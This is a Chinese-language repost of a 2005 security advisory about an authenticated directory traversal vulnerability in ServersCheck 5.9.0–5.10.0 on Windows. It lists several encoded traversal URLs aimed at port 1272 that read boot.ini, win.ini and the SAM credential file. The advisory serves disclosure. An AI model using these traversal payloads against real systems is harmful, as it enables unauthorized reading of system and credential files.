[翻译]ServersCheck认证用户远程目录遍历漏洞
剑心[B.C.T] 来源: [url]http://securitytracker.com/id?1014075[/url] 2005-5-30SecurityTracker警告ID:1014075
信息来源:[url]http://securitytracker.com/id?1014075[/url]
公布日期:2005.5.29
漏洞影响:系统信息泄露,用户信息泄露
利用方法:已经包含
影响版本:5.9.0 - 5.10.0版本
漏洞描述:rgod公布了在ServersCheck中存在的一个输入有效性漏洞。该漏洞使远
程的认证用户可以浏览目标系统上的文件。
ServersCheck软件系统没有完全的验证用户提供的请求,远程用户可以提交一个
精心构造包含目录遍历字符的URL来浏览目标系统的文件。
提供一部分攻击的漏洞利用Url如下:
http://[target]:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://[target]:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..
/boo t.ini
http://[target]:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://[target]:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://[target]:1272/../../ ../../../../../../../boot.ini
http://[target]:1272/../../../../../../../../boot.ini
http://[target]:1272/../../../../boot.ini
解决办法:公告发出时还没有提供有效的解决办法。
厂商地址:[url]www.serverscheck.com[/url]
漏洞成因:访问控制错误,输入有效性错误。
影响平台:Windows (2000), Windows (2003), Windows (XP)
漏洞发布:<[email]retrogod@aliceposta.it[/email]>
历史消息:无。
页:
[1]